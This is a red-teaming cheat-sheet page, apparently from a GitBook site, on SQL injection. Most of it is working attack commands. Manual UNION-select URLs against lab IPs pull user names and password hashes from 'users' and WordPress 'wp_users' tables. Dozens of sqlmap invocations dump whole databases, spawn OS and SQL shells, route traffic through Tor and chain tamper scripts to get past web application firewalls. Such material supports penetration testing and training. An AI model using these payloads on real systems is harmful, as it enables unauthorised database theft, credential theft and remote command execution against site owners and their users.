Red Teaming and Malware Analysis
  • About
  • Red Teaming
  • Cheat Sheet
    • Web
      • Misc
      • File Upload bypass
      • Authentication bypass
      • SQL Injection
      • XSS
      • XXE
      • Reverse-shell
      • Webshell
      • (De)Serialization
    • Active Directory
    • Services by port
      • Enum
      • 5060 - SIP
      • 25 - SMTP
      • 135 - RPC
      • 445 - SMB
      • 11211 - PHPMemCached
      • ldap
    • Hardening
    • Stuff
      • Basic tips/scripts
      • OpenBSD & NetBSD
      • File Transfer
      • Pivoting
  • Active Directory 101
    • Dumping Active Directory DNS using adidnsdump
    • PrintNightmare
    • From DFSCoercer to DA
  • Fuzzing and Web
    • Server Side Template Injection (SSTI)
    • Finding SSRF (all scope)
    • Format String Exploitation
    • Cache Poisoning using Nuclei
  • Initial Foothold
    • Browser In The Browser (BITB) Attack
    • Phishing with Office
      • Weaponizing XLM 4.0 macros
  • Privilege Escalation (Privesc)
    • AV/EDR Bypass
      • Bypass AV/EDR using Safe Mode
      • Resources
    • UAC bypass
    • Process migration like meterpreter
  • Lateral Movement (Pivoting)
    • From Windows VPN + Kali VPN + DC
      • By using Proxifier
  • Persistence
  • Command and Control (C&C)
    • CobaltStrike 101
      • Pivoting DMZ: weevely + ngrok + CS Pivot COMBO via Linux
      • Extras + Plugins
      • Resources
  • Data Exfiltration
    • Extracting certs/private keys from Windows using mimikatz and intercepting calls with burpsuite
  • CVE & Exploits / CTF
    • Privilege Escalation
    • Serialization
    • CVEs
      • CHIYU IoT devices
      • Chamilo-lms-1.11.x - From XSS to account takeover && backdoor implantation
    • CVE - Submission Guides
  • Tools
    • Intel
    • OSINT
    • DNS
    • WEB
      • API and WS Hacking
      • Web Discovery
      • Web Fuzzing
      • Path Traversal
      • GraphQL
      • JWT
    • Infrastructure and Network
      • Scan and Discovery
        • Network mapper
      • Automated Scanners
      • Misc
      • Active Directory
        • Burpsuite with Kerberos Auth
      • Cloud & Azure
      • Command and Control (C&C)
      • (De)serialization
      • Lateral Movement
      • Powershell
    • Privilege Escalation
    • Exfiltration
    • Persistence
    • Password & Cracking
      • Wordlists
      • Tips
      • Rainbow Crackalack
    • Static Code Analysis
    • Reporting
  • Resources
  • Pwnage
    • WiFi
      • HOSTAPD-WPE
      • Rogue APP
      • WPA3 Downgrade attack
    • NRF
    • rubber ducky
  • Malware Analysis
  • Unpacking
  • Basic tips
  • Malware instrumentation with frida
  • Tools
    • Debuggers / Disassemblers
    • Decompilers
    • Detection and Classification
    • Deobfuscation
    • Debugging and Reverse Engineering
    • Memory
    • File Analysis
    • Emulators
    • Network Traffic Analysis
    • Other
    • Online Tools
  • Resources
    • DFIR FTK Imager
    • Convert IP Range into CIDR
    • Parsing Large Raw Files and Excluding Country IP Address Ranges
    • Windows Logs Automation
      • amcache.hve
    • Windows EventViewer Analysis | DFIR
    • Prevent Windows shutdown after license expire
    • Firewall raw Logs
  • Mobile
    • Tools
    • Reverse iOS ipa
      • Jailbreak
      • Install Frida iPhone 5S
      • Frida instrumentation
      • Resources / Extra features
    • Reverse Android APKs
      • Android Dynamic Analysis
      • Bypass root + Frida
      • SSL unpining frida + Fiddler/Burp
      • Backdooring/patch APKs
    • Basic tips
    • Resources
  • IoT / Reverse / Firmware
    • Basic tips
      • Repair NTFS dirty disks
    • Reverse IoT devices
      • Reverse TP-Link Router TL-WR841N
      • Reverse Trendnet TS-S402 firmware
      • Full emulate Netgear WNAP320
      • Reverse ASUS RT-AC5300
      • Reverse LinkOne devices
    • Tools
      • Qemu + buildroot 101
      • Kernel
    • Resources
Powered by GitBook
On this page
  • Manual tests
  • SQLmap 101
  • Simple Usage
  • Automatic GET request parameter
  • Specify the GET request parameters to Exploit
  • Use POST requests (Test All parameters)
  • SQLMap Request file as input
  • Use Authenticated Session With Cookie
  • Use Authenticated Session with Auth Headers
  • Basic Authentication
  • Use Previously created Session as SQLmap input (-s)
  • Post Exploitation Commands
  • List the Databases
  • List Tables of Database TARGET_DB
  • List Columns of Table TARGET_TABLE of Database TARGET_DB
  • Dump Specific Data of Columns of Table TARGET_TABLE of Database TARGET_DB
  • Fully Dump Table TARGET_TABLE of Database TARGET_DB
  • Dump full Database
  • Custom SQL query
  • Get OS Shell
  • Get SQL shell
  • SQLMap Proxy
  • Proxy through Burpsuite
  • Use Tor Socks5 proxy
  • Extra
  • Specify The Database Type
  • Attack Techniques
  • Specify the Injection Techniques
  • Use Default Options for the process
  • –force-ssl flag
  • Tamper Scripts

Was this helpful?

  1. Cheat Sheet
  2. Web

SQL Injection

Manual tests

 http://10.11.15.137/comment.php?id=756'
 http://10.11.15.137/comment.php?id=756 order by 7
 http://10.11.15.137/comment.php?id=756 union all select 1,2,4,5,6,7
 http://10.11.15.137/comment.php?id=756 union all select 1,2,4,5,table_name,7 from information_schema.tables
 http://10.11.15.137/comment.php?id=756 union all select 1,2,4,5,column_name,7 from information_schema.columns where table_name='users'
 http://10.11.15.137/comment.php?id=756 union all select 1,2,4,5,concat(name,0x3a,password),7 FROM users

http://10.11.1.251/wp/wp-content/plugins/wp-forum/feed.php?topic=-4381 union all select 1
http://10.11.1.251/wp/wp-content/plugins/wp-forum/feed.php?topic=-4381+union+select+group_concat(user_login,0x3a,user_pass)+from+wp_users

SQLmap 101

Simple Usage

If you don’t know anything about the target site then use the normal command first, Observe if the sqlmap found something juicy for you

sqlmap -u “https://target_site.com/page/”

Automatic GET request parameter

sqlmap -u “https://target_site.com/page?p1=value1&p2=value2”

Specify the GET request parameters to Exploit

You can specify on which parameter you want to check or exploit the sql injection using just “-p” flag.

sqlmap -u “https://target_site.com/page?p1=value1&p2=value2” -p p1

Use POST requests (Test All parameters)

sqlmap -u “https://target_site.com/page/” --data="p1=value1&p2=value2"

SQLMap Request file as input

You can specify a request file containing the HTTP request, You can get it quickly from BurpSuite.

sqlmap -r request.txt

Here you can specify the targeted parameter or sqlmap will recognize and will test for all the parameters found.

Specify Custom Position in HTTP request file

You can use asterisk sign(*) to specify which parameter to attack or which place of the request to be attacked. You can specify or mark any part of the request by this method.

Use Authenticated Session With Cookie

sqlmap -u “https://target_site.com/page/” --data="p1=value1&p2=value2" --cookie="Session_Cookie_Value"

Use Authenticated Session with Auth Headers

sqlmap -u “https://target_site.com/page/” --data="p1=value1&p2=value2" --headers="Authorization: Basic YWxhZGRpbjpvcGVuc2VzYW1l"

Basic Authentication

sqlmap -u “https://target_site.com/page/” --data="p1=value1&p2=value2" --auth-type=basic --auth-cred=username:password

Use Previously created Session as SQLmap input (-s)

If you got SQL injection positive somewhere, then sqlmap will automatically create a session file(.sqlite) for later use. Now, If you want to try some other commands later, you can use the session file directly (It will save your time to re-try all the possible payloads and identify the vulnerability and all.)

sqlmap -u “https://target_site.com/page?p1=value1" -s SESSION-FILE.sqlite --dbs

You can use this file from the home path of sqlmap tool’s output directory.

Post Exploitation Commands

If the SQL injection vulnerability observed positive then you can use the following commands to Exploit the SQL injection vulnerability.

List the Databases

sqlmap -u “https://target_site.com/page?p1=value1” --dbs

List Tables of Database TARGET_DB

sqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB --tables

List Columns of Table TARGET_TABLE of Database TARGET_DB

sqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB -T TARGET_TABLE --columns

Dump Specific Data of Columns of Table TARGET_TABLE of Database TARGET_DB

sqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB -T TARGET_TABLE -C "Col1,Col2" --dump

Fully Dump Table TARGET_TABLE of Database TARGET_DB

sqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB -T TARGET_TABLE --dump

Dump full Database

sqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB --dump

Custom SQL query

sqlmap -u “https://target_site.com/page?p1=value1” --sql-query "SELECT * FROM TARGET_DB;"

Get OS Shell

sqlmap -u “https://target_site.com/page?p1=value1” --os-shell

Get SQL shell

sqlmap -u “https://target_site.com/page?p1=value1” --sqlmap-shell

SQLMap Proxy

Proxy through Burpsuite

sqlmap -u “https://target_site.com/page?p1=value1” --proxy="http://127.0.0.1:8080/"

Use Tor Socks5 proxy

sqlmap -u “https://target_site.com/page?p1=value1” --tor --tor-type=SOCKS5 --check-tor --dbs

Extra

Specify The Database Type

sqlmap -u “https://target_site.com/page?p1=value1” --dbms=mysql

You can use other DBMS types like MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, Informix, MariaDB, Percona, MemSQL, TiDB, CockroachDB, HSQLDB, H2, MonetDB, Apache Derby, Amazon Redshift, Vertica, Mckoi, Presto, Altibase, MimerSQL, CrateDB, Greenplum, Drizzle, Apache Ignite, Cubrid, InterSystems Cache, IRIS, eXtremeDB, FrontBase, etc.

Attack Techniques

–technique Specify a letter or letters of BEUSTQ to control the exploit attempts:

  • B: Boolean-based blind

  • E: Error-based

  • U: Union query-based

  • S: Stacked queries

  • T: Time-based blind

  • Q: Inline queries

sqlmap -u “https://target_site.com/page?p1=value1” --technique=BEUSTQ

Specify the Injection Techniques

You can specify the difficulty levels using two flags,

  1. –level = LEVEL Level of tests to perform (1-5, default 1)

  2. –risk=RISK Risk of tests to perform (0-3, default 1)

sqlmap -u “https://target_site.com/page?p1=value1” --risk=3 --level=5

Option: --risk

This option requires an argument that specifies the risk of tests to perform. There are three risk values.

–riks=1: 1 is default value which is for the majority of SQL injection points.

–riks=2: Adds to the default level the tests for heavy query time-based SQL injections

–riks=3: Value 3 adds also OR-based SQL injection tests.

Option: --level

When the value of --level is >= 2 it tests also HTTP Cookie header values. When this value is >= 3 it tests also HTTP User-Agent and HTTP Referer header value for SQL injections.

Use Default Options for the process

Use –batch flag to use all the default options or used for non-interactive sessions. (By specifying –batch flag, sqlmap will not ask you for the (Y/N) choice rather then it will smartly choose according to the needs.)

sqlmap -u “https://target_site.com/page?p1=value1” --batch

–force-ssl flag

Force SQLmap to use SSL or TLS for its requests.

Error: Can’t establish SSL connection

If you getting the following error during testing then you can use the flag –force-ssl to force SQLMap to use SSL or TLS.

Tamper Scripts

You can use the tamper scripts to bypass WAF or to modify the payload. You can use multiple tampering scripts at once using –tamper flag.

sqlmap -u “https://target_site.com/page?p1=value1” --tamper=charencode

For General Perpose Usecase:

--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

MSSQL:

--tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dsash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

MySQL:

--tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

OR You can create your own Custom Tamper script to overcome the issue of some type of Encrypted payloads like AES, DES, Hashing, etc.

PreviousAuthentication bypassNextXSS

Last updated 3 years ago

Was this helpful?

LogoGitHub - kleiton0x00/Advanced-SQL-Injection-Cheatsheet: A cheat sheet that contains advanced queries for SQL Injection of all types.GitHub
LogoSQLMap Cheat Sheet : The Lazy Man's Guide | The Dark SourceThe Dark Source
LogoFull SQL Injection Tutorial (MySQL)Exploit Database
LogoNetSPI SQL Injection Wikinetspi